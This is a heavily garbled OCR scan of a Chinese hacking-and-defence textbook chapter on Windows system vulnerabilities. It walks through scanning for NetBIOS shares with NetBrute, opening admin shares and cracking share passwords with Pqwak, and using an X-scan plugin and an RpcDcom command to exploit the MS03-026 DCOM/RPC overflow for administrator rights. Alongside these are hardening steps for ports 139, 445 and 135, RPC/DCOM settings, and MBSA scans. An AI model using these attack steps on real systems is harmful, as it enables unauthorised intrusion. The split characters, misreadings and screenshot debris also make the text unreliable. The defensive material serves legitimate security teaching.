服务 器 软件 ， 目 前 在 全 世界 广 为 使 用 ， 但 前 不 久 它 一 个 又 一 个 的 漏洞 被 发 现 ， 许 多 
@ 脚本 攻击 。 脚 本 〈Script) 是 使 用 一 种 特定 的 描述 性 语言 ， 依 据 一 定格 式 编写 的 可 执 

算 机 系统 的 命令 ， 当 用 户 浏览 网 页 时 ， 一 旦 调用 这 类 脚本 ， 便 会 使 用 户 的 系统 受到 

不 能 够 访问 正常 网 络 服务 的 行为 都 是 拒绝 服务 攻击 。 也 就 是 说 ， 拒 绝 服务 攻击 目的 
e@ 后 门 程序 。 一 般 是 指 那些 绕 过 安全 性 控制 而 获取 对 程序 或 系统 访问 权 的 程序 方法 。 

成 了 安全 风险 ， 容 易 被 黑客 当成 漏洞 进行 攻击 。 














3.2.2 ” ”NetBIOS 漏洞 攻防 


NetBIOS (Network Basic Input Output System， 网 络 基本 输入 输出 系统 ) 是 一 种 应 
用 程序 接口 (API)， 系 统 可 以 利用 WINS 服务 、 广 播 及 Lmhost 文件 等 多 种 模式 ， 将 
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EA 





取 PR D> 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


NetBIOS 名 解析 为 相应 IP 地 址 实现 通信 。 因 此 ， 在 局 域 网 内 部 使 用 NetBIOS 协议 可 
以 方便 地 实现 通信 及 资源 的 共享 。 因 为 它 占 用 系统 资源 少 、 传 输 效 率 高 ， 尤 为 适 于 由 
20 一 200 人 台 计 算 机 组 成 的 小 型 局 域 网 ， 所 以 微软 的 客户 机 /服务 器 网 络 系统 都 是 基于 
NetBIOS 的 。 
当 安 装 TCP/IP 协议 时 ，NetBIOS 也 被 Windows 作为 默认 设置 载 入 ， 此 时 计算 机 也 具 
有 了 NetBIOS 本 和 映 的 开放 性 ，139 站 口 被 打开 。 某 些 别 有 用 心 的 人 束 利 用 这 个 功能 来 攻击 
服务 器 ， 使 管理 员 不 能 放心 使 用 文件 和 打印 机 共享 。 
使 用 NetBrute Scanner 可 以 扫 摘 到 目标 计算 机 上 的 共享 资源 ， 它 主要 包括 如 下 三 部 分 。 
@ NetBrute: 可 用 于 扫描 单 台 机 器 或 多 个 IP 地 址 的 Windows 文件 /打印 共享 资源 。 虽 
然 这 已 经 是 众所周知 的 漏洞 ， 但 作为 一 亚 更 新 中 的 经 典 工 具 ， 对 于 网 络 新 手 以 及 初 
级 网 管 仍 是 增强 内 网 安全 性 的 得 力 助手 。 
@ PortScan: 用 于 扫描 目标 机 器 的 可 用 网 络 服务 。 帮 助 用 户 确 定 哪 些 TCP 端口 应 该 通 
过 防火 墙 设置 屏蔽 挥 ， 或 哪些 服务 并 不 需要 ， 应 该 关闭 。 
@ WebBrute: 可 以 用 来 扫 摘 网 页 目录 , 检查 HTTP 喘 份 认证 的 安全 性 、 测 试用 户 密 
公 。 这 对 于 新 站 在 起 步 阶段 不 全 于 因为 初级 错误 导致 网 站 被 轻易 入 侵 , 仍然 非常 



































有 用 。 
使 用 NetBrute Scanner 软件 来 扫描 计算 机 中 共享 资源 的 具体 操作 步骤 如 下 。 
STEP01: 运行 NetBrute Scanner STEP02: 选择 要 打开 的 文件 


婴 | NetBrute Scanner by Raw Logic Scftware 
Options Help 
NetBrute | PortScan | webBrute | 
Resuls : Port Settings 


I 加 温 132.168.1.88 Time Dut: TCP Port : 
~… 昕 逢 中 - 


-是 Documents IP Range : 


a Es Enc 1 (1).ipg 2010/3/11 14:1.— 


的 外 254 


多 H$ ; 
- 留 HP LaserJet Proflessional M11 Lancal | 中 1 pg EE 


外 Pictures | 
i -Result Obtions 咽 1 (2)jpg 2010/3/11 14:2: 
tt NY [lw NetBIOS Names 


© PRINT 








-Single ] 加 


Computer:Host Name | 
六 件 名 加) : 
Report View 大 _© GetlP | 文件 类 型 (7): 


JADMINIBTRATORF |AL8QD1ETPGKVS1Y 




















设置 扫描 的 P“” 国 单 击 "Scan” 国 双击 扫描 ”图 选中 要 打开 的 文件 。 国 单 击 “ 打 开 ” 按 钮 。 


地 址 范围 。 按钮 。 到 的 计算 机 
IP 地 址 。 








双击 扫描 到 的 共享 文件 夹 ， 如 果 没 有 密码 ， 便 可 直接 打开 。 当 然 ， 也 可 以 在 正 的 地 址 
栏 中 直接 输入 扫描 到 的 共享 文件 夹 IP 地 址 ， 如 “\\192.168.1.88”( 或 带 C$ ，D$ 等 查看 默 
认 共 享 )。 如 果 设 有 共享 密码 ， 则 会 要 求 输入 共享 用 户 名 和 和 密码， 这 时 利用 破解 网 络 邻 大 密 
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码 的 工具 软件 (如 Pqwak) 破解 之 后 ， 才 可 以 进入 相应 文件 来。 如 果 发 现 自 己 的 计算 机 中 
有 NetBIOS 漏洞 ， 要 想 抵御 入 侵 者 利用 该 漏洞 进行 攻击 ， 则 须 关 闭 NetBIOS 漏洞 。 关 闭 的 
方法 有 很 多 种 。 

(1) 解 开 文件 和 打印 机 共享 绑 定 















号 | 园 控制 面板 ， 所 有 控制 面板 项 ， -| 好 | Ee | -一 
> 一 一 一 一 一 一 一 一 一 一 一 一 一 一 ("| 年 < 所 S 坟 制 面 反 页 ， 网 络 和 共享 中 心 
调整 计 往 机 的 设备 i 文件 ”编辑 (E) ”查看 (V) 工具 (T) ”帮助 (H) 
< 板 主 页 
史 坷 | 泛 项 运 知 区 域 图 标 查看 基本 网 络 信息 并 设置 连接 
的 ) 二 中 训 直 ”网络 和 共享 中 心 i 一 一 他 
i i 4L8QD1ETPGKY... 网 络 3 
| 位 置 和 其 他 传感器 文件 夹 选项 i 
类 二 周 5 查看 活动 网 络 
村 | 性 能 信息 和 工具 于 | 颜色 管理 a 
[ 击 宕 难 名 答 喘 、 用 户 帐户 EB 四 时 萝 ， 训话 网 阁 
j 了 3 三 二 3 号 


在 “控制 面板 ”窗口 中 单 击 “网 络 和 共享 中 心 " 选 ”在 窗口 左 侧 单 击 “ 更 改 适配器 设置 ”选项 。 
项 。 


STEP03: 查看 网 络 连 接 STEP04: 更 改 本 地 连接 属性 


是 本 地 连接 属性 

< 二 如 < 网络 和 Internet ， 网 络 连 接 ， -| 好 || 状 寺 0 | 

文件 (F) ”编辑 (E) ”查看 MV) 工具 (T) 高 级 (N) 甘 接 时 使 用 
组 织 禁用 此 网 络 设备 诊断 这 个 连接 Atheros ARB151 PCI-E Gi gabit Ethernet Control] 


ds (0) 








| 本 地 连接 | mm” 
Sp 网络 3 | 国 禁用 (B) 已 断 开 连 接 


大 27 AtherosA WAN Miniport (PPPOE) 
状态 (U) 


诊断 四 





各 ”桥接 (G) 
创建 快 皇 方式 (S) 


删除 (D) 


国 。 重 命名 (M) 


| eR 











右 击 “本 地 连接 ”， 在 快捷 菜单 中 选择 “属性 ” 命 取消 勾 选 “Microsoft 网 络 的 文 单 击 “ 确 
令 。 件 和 打印 机 共享 ” 复 选 框 ， 即 可 解 ” 定 ”按钮 。 
开 文 件 和 打印 机 共享 绑 定 。 


这 样 , 就 可 以 禁止 所 有 来 自 139 端口 和 445 端口 的 请 求 , 别人 也 就 看 不 到 本 机 的 共享 了 。 
(2) 使 用 IPSec 安全 策略 阻止 对 139 端口 和 445 端口 的 访问 


人 





SI/ 
六 [ gr 划 安 全- ET 
人 人 人 他 


STEP01: 打开 控制 面板 STEP02: 查看 各 种 工具 








(关口 ， 控制 面板 ， 所 有 控制 面 板 项 》 -| 她 || : 


文件 (| ”编辑 (E) ”查看 (V) 工具 (T 帮助 (H) 文件 (| ” 编 缉 (E) ”查看 V) ”工具 (T) ”者 助 (H) 
调整 计算 机 的 设置 


名 称 修改 日 其 
| 旦 序 和 功能 Zr 电话 和 调制 解 调 器 多 Internet 信息 服务 (IIS) 管 理 器 2013/12/16 10:56 
上 程序 和 功能 Ey 语 解 已 isCsI 发 起 程序 2009/7/14 12:41 
曙 windows PowerShell Modules 2009/7/14 12:52 


NG ss: | 4 
Ey 电源 选项 忆 个 性 化 上 戎 ] Windows 内 存 涂 新 2009/7/14 12:41 


2011/5/26 10:15 





‘A 恢复 és tutuDisk (W:) 2011/5/26 10:15 
有 MSN 上 的 “我 的 网 站 " | 入 2009/7/14 12:41 
2009/7/14 12:41 


1 ts 
家 长 控制 国 同 | ; 17114 12 
点 @ a | 2009/7/14 1241 
i 4L8QD1ETPGKV51W ll ee 


> 默认 程序 2009/7/14 12;42 








最 ZKG 


vv \ 安 坊 : a 一 创 项: 2011/5/26 10: 
轻松 访问 中 心 ( 建 日 革 : 2011/5/26 10:15 





在 “控制 面板 ”窗口 中 单 击 “ 管 理工 具 ” 选 项 。 双击 “本 地 安全 策略 ”选项 。 
STEP03: 创建 IP 安全 策略 


文件 (Pi ”村 作 (A) 可 者 (V) 帮助 (H) 
争 外 | 次 国 | 纪 忆 | 日 后 | 竹 主 


























a 右 击 “IP 安 全 策略 ， 在 本 地 十 算 机 ” 子 项， 在 弹 
s a a 义 一 条 阻止 任何 IP 地 址 从 TCP139 和 TCP445 端 口 访 
i st nas 问 IP 地 址 的 IPSec 安全 策略 规则 ， 这 样 即使 别人 使 
下 看 W 用 扫描 器 扫描 ， 本 机 的 139 和 445 两 个 端口 也 不 会 

(3) 关闭 Server 服务 
终止 了 对 其 他 计算 机 的 共享 。 但 关闭 该 服务 将 会 导致 很 多 相关 的 服务 无 法 局 动 ， 如 计算 机 
中 有 IIS 服务 ， 则 不 能 采用 这 种 方法 。 


此 视图 中 没有 可 县 示 的 项 目 。 
A 出 的 快捷 菜单 中 选择 “创建 |P 安 全 策略 ”命令 。 定 
加 IP 安全 策略 , 在 本 地 计算 已 
导出 列表 (L)... 给 了 任何 加 应 O 
关闭 Server 服务 虽然 不 会 关闭 端口 ， 但 可 以 终止 本 机 对 其 他 计算 机 的 服务 ， 当 然 也 就 
STEP01: 打开 控制 面板 STEP02: 查看 各 种 工具 











(回国 ， 过 Ni ， 所 有 注 制 面板 页 ， ~ | 弛 | | 芝 和 党 汉 古 : 
文件 (FP) ”编辑 (E) ”可 看 (V) 工具 (T) ”帮助 (H) 文件 (F) ”编辑 (E) ” 查 春 (V) 工具 (T) ”帮助 (H) 
调整 计算 机 的 设置 
司 程序 和 功能 dr 电话 和 调制 解 调 外 全 Internet 信息 服务 (IIS) 管 理 器 2013/12/16 10:56 。 快 # 
a . ' 后 iSCSI 发 起 程序 2009/7/1412:41 + 
辣 电源 选项 [= 个 性 化 2 ; 葬 Windows PowerShell Modules 2009/7/14 12:52 


戎 |] Windows 内 存 涌 浙 2009/7/14 12:41 


A 恢复 坚 本 地 安全 策略 2011/5/26 10:15 
Es tutuDisk (W;) 2011/5/26 10:15 





| 朋 MSN 上 的 “我 的 网 站 " | 6 2009/7/14 12:41 
高 级 安全 Wi 2009/7/14 12:41 

王 纪 | ; 
二 家 庭 组 点 家 长 注 制 伯 网 阁 2009/7/14 12:41 
i i 2009/7/14 12:42 

ep 1 \ -加 / 
o> 键盘 > 默认 程序 曾 4L8QD1ETPGKV51W | Be 

[rm 1 md] 
副 凭据 管理 器 人 放弃 松 访问 中 必 : 志 | 豫 已 共享 创建 日 期 : 2009/7/14 12:41 

Ne 所 改 日 期 | 2009/7/14 12:41 
wy 1.25 KB 








在 “控制 面板 ”窗口 中 单 击 “管理 工具 ” 选 双击 “服务 ”选项 。 
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STEP03: 关闭 服务 


“中 DaBlgm ern, 
服务 (本 地 ) OO 





在 窗口 右 侧 关闭 Server 服 务 。 


各 Shell Hardware ..。 为 让 


管理 .… 














(4) 在 防火 场 中 设置 阻止 其 他 机 器 使 用 本 机 共 孚 
运行 天 网 个 人 防火 墙 ， 打开 “修改 IP 规则 ”对 话 框 ， 有 具体 设置 步骤 如 下 。 


STEP01: 修改 IP 规则 STEP02: 应 用 规则 


天 网 防火 寺 下 由 际 


国 州 党 世间 世人 合 ? 


安全 级 别 : 自 定义 wwweesewsewsee | 


多 主 目 己 用 pine 前 令 探 出 其 地 机 噬 


i 





选择 一 条 空 规则 之 后 ， 设 置 数 据 包 方向 为 “接收 "， 在 “ 自 定义 IP 规则 ”列表 中 勾 选 设置 的 规则 ， 即 可 
对 方 IP 地 址 选 “任何 地 址 ”"， 数 据 包 协议 类 型 为 ”启动 139 端口 攻击 拦截 。 

“TCP”， 本 地 端口 设置 为 “从 139 到 179”， 对 方 端 

口 设置 为 “从 0 到 0”"， 设 置 TCP 标 志 位 为 “SYN”， 

动作 设置 为 “拦截 "， 单 击 “ 确 定 ”按钮 。 


7 国富 计 席 | 


站 黑 
靳 


仗 亿 性 





ee | 
全- 攻防 从 入 门 到 精通 


3.3 Dceoml 漏洞 人 侵 曝 光 


DcomRpc 漏洞 往往 是 利用 溢出 工具 来 完成 入 侵 的 ， 其 实 ,“ 淤 出 ”入 侵 在 一 定 程 度 上 
也 可 看 成 系统 内 的 “间谍 程序 ” 它 对 黑客 们 的 入 侵 一 呼 即 应 ， 一 应 即将 所 有 权限 “拱手 送 
人 ” 认识 DcomRpc 漏洞 入 侵 手 段 ， 有 助 于 更 好 地 进行 计算 机 安全 防护 。 











3.3:1 DeomRpt 漏洞 描述 


RPC (Remote Procedure Call) 服务 作为 操作 系统 中 的 一 个 重要 服务 ， 其 描述 为 “提供 终 
结 点 映射 程序 (Endpoint Mapper) 以 及 其 他 RPC 服务 ” 系统 大 多 数 功 能 和 服务 都 依赖 于 它 。 
局 动 RPC 服务 的 具体 操作 方法 如 下 。 


SEEUI 人 打开 “管理 工具 ”窗口 STEP02: 查看 各 种 服务 


| x 


Iassrsa P| 





[文件 (。 扣 作 (A) 喜 看 WV) 帮助 (H) 
“Genre 





Remote Procedure Call (RPO) 名 称 和 





总 述 : 总 

Nt 的 i 
。 它 执行 COM 

和 DCOM 服务 器 的 对 条 激活 请 求 。 。 沪 Pro 

对 象 导 测 程 序 解析 和 分 布 式 垃圾 收 

集 。 如果 此 服务 被 停 用 或 禁用 ， 则 使 《 泪 Remote Access 

用 COM 或 DCOM 的 程序 梅 无 法 上 。 

第 工作 。 强 列 建 议 您 让 RPCSS 服务 运 卫 

行 























在 “控制 面板 ” 窗 中 依次 单 击 “ 系 统 和 安全 ”>“ 管 ”双击 “Remote Procedure Call” 服 务 项 。 
理工 具 " 选 项 ， 在 “管理 工具 ”窗口 中 双击 “服务 

图 标 。 

STEP03: 查看 服务 依赖 关系 


ote Procedh re call ( SPC) 





os 
Remote Frocedure Call [RFC) 


此 服务 依赖 以 下 系统 组 件 (7): 


由 - © DCOM Server Process Launcher 


外- REC Endpoint Napper 
i “依存 关系 ”选项 卡 , 即 可 查看 一 些 服务 的 依 
以 下 系统 组 件 依赖 此 服务 到 ): 选择 “依存 关系 ”选项 卡 
360 杀毒 详 时 防护 加 载 服务 赖 关 系 。 


点 tiTYeX Installer IceTrstSY] 


hpplication Tdentitw 


hpplication Information 
Backeround Intellieent Transfer Service 
Base Filterine Eneline 
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从 显示 服务 可 以 看 出 受 其 影响 的 程序 有 很 多 , 其 中 包括 DCOM (Distributed Component 
Object Model， 分 布 式 组 件 对 象 模型 ) 接口 服务 。 这 个 接口 用 于 处 理由 客户 问 机 器 发 送 给 服 
务 器 的 DCOM 对 和 象 激活 请 求 ( 如 UNC 路 径 )。 攻击 者 成 功利 用 此 漏洞 可 以 以 本 地 系统 权限 
执行 任 蔚 指令。 攻击 者 可 以 在 系统 上 执行 任意 操 作 ， 如 安装 程序 ， 介 看 或 更 改 、 删 除数 据 
或 建立 系统 管理 员 权 限 的 账户 。 

DCOM 协议 的 前 身 是 OSF RPC 协议 ， 但 增加 了 微软 自己 的 一 些 扩展 内 容 。 扩 展 了 组 
件 对 象 模型 技术 , 使 其 能 够 文 持 在 局 域 网 .广域网 甚至 Internet 上 不 同 计算 机 的 对 象 乙 间 的 
通信 。 

对 DCOM 进行 相应 的 配置 的 具体 操作 步骤 如 下 。 


STEP01: 打开 “组 件 服务 ”窗口 


























名 , 组 件 服务 eae 
鲍 。 文件 (月 ”操作 (A) ”和 癌 看 (V) ”窗口 (W) ”帮助 (H) 
包 中 | 方 国 | 上 目 G1 日 国 | 全 | 图 当家 如 襄 


{145B4335... {152DA46... {19BCA96... {1BA783C... {1BE1F76¢ 


会 会 会 会 会 


{1fb2a002.. {27170d7... {2C5BC43... {304CE942... {3282082: 























上 < 全 他 全 全 > 








在 “运行 ”对 话 框 中 输入 “Dcomcnfg ”命令 并 按 ” 单 击 “组 件 服务 ”前 面 的 “+” 号 ， 依 次 展开 各 项 ， 
<Enter> 键 ， 即 可 弹出 “组 件 服务 ”窗口 。 直到 出 现 “DCOM 配置 ”项 为 止 , 即 可 根据 需要 对 
DCOM 中 的 各 对 象 进行 相关 配置 。 


因为 DCOM 可 以 远程 操作 其 他 计算 机 中 的 DCOM 程序 ， 该 技术 使 用 了 用 于 调用 其 他 
计算 机 所 具有 的 函数 的 RPC (远程 过 程 调用 )， 所 以 利用 这 个 漏洞 ,攻击 者 只 须发 送 特殊 形 
式 的 请 求 到 远程 计算 机 上 的 135 端口 ， 轻 则 造成 拒绝 服务 攻击 ， 重 则 远程 攻击 者 以 本 地 管 
理 员 权限 执行 任何 操作 。 














3.3.2 ”DcomRpCe 入 侵 实 战 


目前 已 知 的 DcomRpc 漏洞 有 MS03-026 〈DcomRpec 接口 堆栈 缓冲 区 溢出 漏洞 )、 
MS03-039〔 堆 洲 出 源 洞 )、RPC 包 长 度 域 造成 的 堆 洲 出 源 洞 和 几 个 拒绝 服务 源 洞 。 

利用 这 个 漏洞 ， 可 以 发 送 畸 形 请 求 给 远程 服务 器 监听 的 特定 DcomRpc 端口 ， 如 135、 
139、445 等 问 口 。 在 进行 DcomRpc 漏洞 洲 出 攻击 前 , 用户 须 下 载 DcomRpc.xpn 作为 X-scan 
插件 ， 复 制 到 X-scan 所 在 文件 夹 的 Plugin 文件 夹 中 ， 扩 展 X-scan 的 扫 朱 DcomRpc 漏洞 
的 功能 ， 也 可 下 载 rpcdcom.exe 专用 DcomRpc 漏洞 扫描 工具 ， 扫 描 具 有 DcomRpc 漏洞 的 
目标 主机 ， 使 用 网 上 诸多 的 DcomRpc 洲 出 工具 进行 攻击 。 

下 面 以 DcomRpc 接口 漏 铜 溢出 为 例 曝光 洪 出 的 方法 ， 其 体 的 操作 方法 如 下 。 
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EA 





取 PR D> 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP01: 复制 DcomRpc.xpn 插件 STEP02: 运行 X-scan 扫描 工具 












(CIOK « X-Scan-v3,3-cn  X-Scan-v3,3 » plugins » 
文件 (F) ” 编 铝 (E) ” 童 看 (V) 工具 (T) 帮助 (H) 
组 织 ” ” 门 打开 ”新 结 文 件 实 ~v 团 ®@ 








crack_smtp.xpn crack_socks.xpn crack_sql.xpn 





XPN 文件 
修 民 日 其 ee 16:09 


确定 取消 


a 计时 0 i219 16:09 

















将 下 载 的 DcomRpc.xpn 插 件 复制 到 X-scan 的 Plugin ”运行 X-scan 扫描 工具 ， 选 择 “ 设 置 ” > "扫描 参数 ” 

文件 夹 中 ， 作 为 X-Scan 插件 。 菜单 命令 ， 即 可 弹出 Pe 对 话 框 。 选 择 
“全 局 设置 ”>“ 扫 描 模块 ”选项 ， 即 可 看 到 增加 的 
“DcomRpc 溢出 漏洞 ”模块 。 


在 使 用 X-Scan 扫描 到 具有 DcomRpc 接口 漏洞 的 主机 时 ， 可 以 看 到 在 X-Scan 中 有 明 
显 的 提示 信息 。 如 果 使 用 专用 DcomRpc 溢出 漏洞 扫描 工具 RpcDcom.exe， 则 可 先 打 开 “ 命 
令 提示 符 ” 窗 口 ， 进 入 RpcDcom.exe 所 在 文件 夹 ， 执 行 “RpcDcom -d IP 地 址 ”命令 后 ， 
开始 扫 摘 并 看 到 最 终 的 扫 拉 结果。 
如 果 操 作成 功 ， 则 执行 溢出 操作 将 立即 得 到 被 入 侵 主 机 的 系统 管理 员 权 限 。 











3.3.3 DCcomRptc 防范 方法 


既然 系统 中 存在 看 这 样 一 个 “功能 强大 ”的 间谍 漏洞 DcomRpc， 就 不 得 不 对 这 个 湄 洞 
的 防 郊 加 以 重视 ， 下 和 面 推荐 四 种 防范 方法 。 

1) 打 好 补丁 。 对 于 任何 漏洞 来 说 ， 打 补丁 是 最 方便 的 方法 了 ， 因 为 一 个 补丁 的 推出 往 
往 包 含 了 专家 们 对 相应 漏洞 的 彻底 研究 ， 所 以 打 补 本 也 是 最 有 效 的 方法 之 一 。 下 载 补 丁 应 
尽 可 能 地 在 服务 三 商 的 网 站 中 下 载 ， 打 补丁 的 时 候 务 必 注 意 补 丁 相 应 的 系统 版 本 。 

2) 封锁 135 端口 。135 端口 非常 危险 ， 但 部 难以 了 解 共 用 途 、 无 法 实际 感受 到 其 危险 
性 的 代表 性 端口 之 一 。IE'en 是 一 于 能 够 让 用 户 曹 识 到 B5 端口 危险 性 的 工具 该 工具 是 由 提 
供 安全 相关 技术 信息 “和 工具 关 软 件 的 “Security Friday.com” 公 司 提供 的 。 其 目的 是 以 人 简单 
明了 的 形式 验证 了 135 端口 的 危险 性 ， 呼 吁 用 户 加 强 安 全 设置 。 不 过 ， 由 于 该 工具 的 特征 
代码 退 加 到 了 病毒 定义 库 文 件 中 。 如 果 在 安装 了 该 公司 的 病毒 扫描 软件 的 计算 机 中 安 闭 
IE'en， 束 有 可 能 将 其 视 为 病毒 。 

3) 关闭 RPC 服务 。 关 闭 RPC 服务 也 是 防范 DcomRpc 漏洞 攻击 的 有 效 方法 之 一 ， 有 具 
体 方法 为 : 在 “控制 面板 ”窗口 中 依次 单 击 “ 管 理工 具 ” 选 项 ， 打 开 “ 管 理工 具 ” 窗 口 。 
双击 “服务 ”图 标 ， 打 开 “ 服 务 ” 窗 口 。 双 击 “Remote Procedure Call” 选 项 ， 在 弹出 的 对 
话 框 中 将 启动 类 型 设置 为 “已 禁用 ”这样 目下 次 启动 开始 RPC 就 将 不 再 启动 。 

要 想 将 其 设置 为 有 效 ， 须 在 注册 表 编 辑 器 中 将 “HKEY LOCAL MACHINR\SYSTEM\ 


so 


















































第 3 章 


系统 漏洞 攻防 


CurrentControlSet\Services\RpcSs” 的 “Start” 的 值 由 0X04 变 成 0X02， 再 重新 局 动 计 算 机 即 可 。 
进行 这 种 设置 将 会 给 Windows 运行 市 来 很 大 影响 。 这 是 因为 很 多 Windows 服务 都 依赖 
于 RPC， 将 RPC 设置 为 无 效 后 ， 这 些 服务 将 无 法 正音 司 动 。 由 于 这 样 做 的 新 病 非 党 大 ， 
此 一 般 不 建议 关闭 RPC 服务 。 
4) 手动 为 计算 机 启用 (或 禁用 ) DCOM。 除 上 述 方法 外 ， 还 可 通过 手动 方法 禁 








DCOM 服务 。 
这 里 以 Windows 7 为 例 ， 具 体 的 操作 步骤 如 下 。 
STEP01: 打开 “运行 ”对 话 框 STEP02: 查看 计算 机 属性 


点 组 件 服务 
和 多， 文件 (F) ”操作 (A) ”过 看 (V) 窗口 (W) ”帮助 (H) 








Te Windows 将 根据 您 所 输入 的 名 称 ， 为 您 打开 相应 的 程序 、 
一 一 文件 去 、 文 栏 或 Internet 资源 。 


二 一 一 一 





' 加 现 8 用 有 [一 
国 事件 下 看 器 ( 术 局 新 所 有 组 件 (A) 
对 服务 (本 地 ) 查看 (V) 
从 这 里 创建 窗口 (W) 


导出 列表 (D… 





























在 文本 框 中 输入 单 击 “ 确 定 " 按钮 。 依次 选择 “控制 台 根 节点 ”>“ 组 件 服务 ”> “计算 


“Dcomcnfg” 命 令 。 机 ”"”， 右 击 “ 我 的 电脑 ”并 选择 “属性 ”命令 。 
STEP03: 更 改 属 性 STEP04: ”远程 计算 机 操作 








口 在 此 计算 机 上 启用 Col Internet 服务 ) 
默认 分 布 式 con 通信 属性 
身份 验证 级 别 指定 数据 包 级 别 上 的 安全 。 
默认 身份 验证 级 别 0: 
| 连接 


局 新 咱 
帮助 (H) 




















入 是否 可 以 确定 其 调用 者 ， 以 及 是 否 可 以 使 右 击 “计算 机 ”选项 ， 并 选择 “新 建 ”> “计算 机 ” 
全 从 
DO xo 


默认 模 所 级 别 CI): 
标识 拉 STEP05: ”打开 “添加 计算 机 ”对 话 框 





加 要 信用 身份 验 赴 且 默 认 模 拟 银 别 不 是 匿名 ， 刚 可 以 提供 引用 跟 
[| 提 共 附加 的 引用 跟踪 安全 它 ) 


进一步 了 解 如 何 设 凋 这 些 甘 性 。 








选择 “默认 属性 " 选项 卡 , 取 国 单 击 “ 确 定 ， 


消 义 选 “在 此 计算 机 上 启用 分 布 按钮。 在 文本 框 中 输入 计算 机 名 称 或 单 击 右 侧 的 “浏览 ， 
式 COM” 复 选 框 。 按钮 ， 即 可 搜索 计算 机 。 


J 





EE 当 
了 Hx KY P72 ey I 
7 2 攻防 从 入 门 到 精通 
新 全 人 人 他 

在 添加 计算 机 后 ,在 计算 机 名 称 列表 中 右 击 该 计算 机 名 称 ， 从 快捷 菜单 中 选择 “属性 ” 
命令 ， 在 打开 的 属性 对 话 框 的 “默认 属性 ”选项 卡 中 取消 色 选 “在 这 台 计 算 机 上 启用 分 布 
式 COM” 复 选 框 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 以 应 用 更 改 设置 并 退出 。 


3.4 用 MBSA 检测 系统 漏洞 


Microsoft 基准 安全 分 析 器 (Microsoft Baseline Security Analyzer，MBSA) 工具 人 允许 用 
户 扫 摘 一 台 或 多 台 基 于 Windows 的 计算 机 ， 以 友 现 常见 的 安全 方面 的 配置 错误 。MBSA 将 
扫描 基于 Windows 的 计算 机 并 检查 操作 系统 和 已 安 闭 的 其 他 组 件 〈 如 IS 和 SQL Server)， 
并 及 时 通过 推荐 的 安全 更 新 进行 修补 。 安 闭 成 功 后 ， 驶 可 以 对 系统 漏洞 进行 安全 分 析 了 。 









3.4.1 检测 单 台 计算 机 


所 台 计 算 机 模式 最 典型 的 情况 是 “ 目 扫 揪 ”， 也 残 古 扫 摘 本 地 计算 机 。 
扫描 单 台 计算 机 的 具体 操作 步骤 如 下 。 


STEP01: 运行 MBSAV2.2 STEP02: 输入 IP 地址 


Microsof | Microsoft 
¥ Baseline Security Analyzer 


t 
从 Baseline Security Analyzer 


Check computers for common security misconfigurations. 


The Microsoft Baseline Security Analyzer can check computers running Microsoft Windows 
Server 2008 R2, Windows 7, Windows® Server 2003, Windows Server 2008, 

Windows Vista, Windows XP or Windows 2000. Scanning computers for security updates 
utilizes Windows Server Update Services. You must have administrator privileges for each 


WORKGROUP\AL8QD1ETPGKY v (this computer) 


KDW - WC (WTR) 


computer you want to scan. 
%D% = domain, %C% = computer, %T% = date and time, %IP% = IP address 


‘Re 


Scan a computer 
Check a computer using its name or IP Address. WW)] Check for Windows administrative vuinerabilities 





De Scan multiple computers 
Check multiple computers using a domain name or a range of IP addresses. 


团 
[ 回 confoue computers for Microsoft Update and scanning prerequisites 


dl View, print and copy the results from the previous scans, 
回 Advanced Update Services options;: 





Learn more about Scanning Options 














© 2002-2010 Microsoft Corporation, All rights reserved. 


选择 “Scan a computer” 选 项 。 默认 选择 当前 计算 机 ， 单 击 “Start Scan” 
输入 需要 检测 的 其 他 计算 ”按钮 。 
机 的 IP 地 址 。 





要 想 打 描 一 全 计算 机 ， 必 须 具 有 该 计算 机 的 管理 员 访 问 权 限 才 行 。 在 上 述 
输入 IP 地 址 的 “Which computer do you want to scan? ”界面 中 有 许多 复 选 框 。 
其 中 涉及 检测 项 目 ， 包括 Windows 操作 系统 本 身 、IS 和 SQL 等 相关 选项 ， 即 
MBSA 的 3 大 主要 功能 。 根据 检测 的 计算 机 系统 中 所 安 北 的 程序 和 实际 需求 来 
勾 选 相应 复 选 框 。 如 果 要 形成 检测 结果 报告 文件 ， 则 在 “Security report name” 


栏 中 输入 报告 文件 名 称 。 





系统 漏 洞 攻 防 


STEP03: 开始 检测 STEP04: 检测 完成 


i Microsoft Baseline Security Analyzer 2.2 和 - 


Microsoft 
< 全 ”Baseline Security Analyzer 


Report Details for WORKGROUP - 4L8QD1ETPGKVS51W (2013-10-30 10:45:43) 
Security assessment: 
< Severe Risk (One or more critical checks failed.) 





Done downloading security update information. 35241681 0 WL8QD1ETPGKV5IW 
WORKGR: 甩 8QD1ETPGKV5IW (2013-10-30 10-45) 
二 二 二 汪 10: 45 

2.2.2170.0 


Microsoft Update 
Sort Order; Score (worstfirst) 


Security Update Scan Results 











开始 自动 检测 已 选择 项 目 并 显示 检测 进度 。 单 击 “Result details” 链 接 ， 即 可 查看 扫描 后 的 安 
全 服 告 内 容 :s 


STEP05: 查看 安全 报告 内 容 


ww Baseline Security Analyzer 


1 security updates are missing. 


Result Details for Developer Tools, Runtimes, and Redistributables 


Security Updates 在 报告 中 存在 严重 Se 隐患 的 项 均 以 红色 " x 显示 ， 


Items marked with 可 are confirmed missing. Items marked with 去 we confirmed missing and are not approved by your System administrator. 


一 中 等 级 别 的 项 则 以 黄色 “x ”显示 。 用 户 还 可 单 击 


Important 


ee “How to correct this” 链 接 得 知 如 何 纠 正 这 些 不 正 


Items marked with 网 represent the most curren ee rot os computer. yu he peed srecent update, it may incorporate 
Previous Updates that wil no longer appear in this list, but are stil providing protection 


ee Ra 当 设 置 。 检测 结果 中 的 第 一 项 ( Security Updates) 


Important 


moor 严重 安全 隐患 是 指 存在 安全 更 新 的 问题 。 








Ifa service pack is lsted, it is recommended 中 at you instal it prior to any other items listed. 


Read more about bylletin severity on Microsoft TechNet. 





3.4.2 检测 多 台 计 算 机 


台 计 算 机 模式 是 指 对 某 一 个 IP 地 址 段 或 整个 域内 的 计算 机 进行 扫描 。 只 须 单 击 左 侧 
“Microsoft Baseline Security Analyzer” 栏 目下 方 的 “Scan multiple computers” 按 钮 ， 即 可 指 
定 要 检测 的 多 台 计 算 机 ， 如 下 左 图 所 示 。 扫描 的 范围 可 通过 在 “Domain name” 文 本 框 中 输 
